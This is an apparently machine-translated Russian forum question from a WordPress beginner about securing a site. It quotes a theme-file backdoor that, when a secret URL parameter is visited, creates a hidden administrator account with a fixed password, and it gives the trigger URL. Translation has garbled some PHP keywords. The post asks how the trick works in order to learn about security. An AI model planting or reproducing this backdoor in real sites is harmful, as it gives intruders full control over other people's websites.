Безопасность WordPress - бэкдор для дочерних тем

Итак, я новичок в WordPress и его структуре папок. Недавно я создал сайт WordPress для клиента, но затем начал искать способы защитить сайт WP. Поскольку это наиболее используемая платформа, она кажется самой большой угрозой, и это одна из причин, по которой я никогда не хотел использовать CMS.

В любом случае, я видел много сообщений о «бэкдорах», реализованных в файле functions.php родительской темы. В принципе, это будет работать так:

add_action ('wp_head', 'wploop_backup');

функция wploop_backup() {Если ($_GET['backd'] == 'wpadmin') {require('wp-includes / registration.php'); Если (! Username_exists('имя пользователя')) {$user_id = wp_create_user('wpadmin', 'imback');$user = новый WP_User($user_id);$user->set_role('администратор'); }}}

Использование : перейдите по этому URL-адресу на целевом веб-сайте:

http://www.yourdomain.com/?backd=wpadmin

Это создает имя пользователя: wpadmin с логином imback

Это легко понять, но некоторые люди упоминали, что хакеры также помещают этот код в другие дочерние темы, поскольку при обновлении родительской темы этот код исчезнет.

У меня вопрос: если бы этот код был в дочерней теме, как его можно было бы использовать для получения доступа к родительской теме для входа в систему?

Думаю, ответ поможет мне понять не только структуру папок WP, но и узнать больше о безопасности.

БЛАГОДАРНОСТЬ!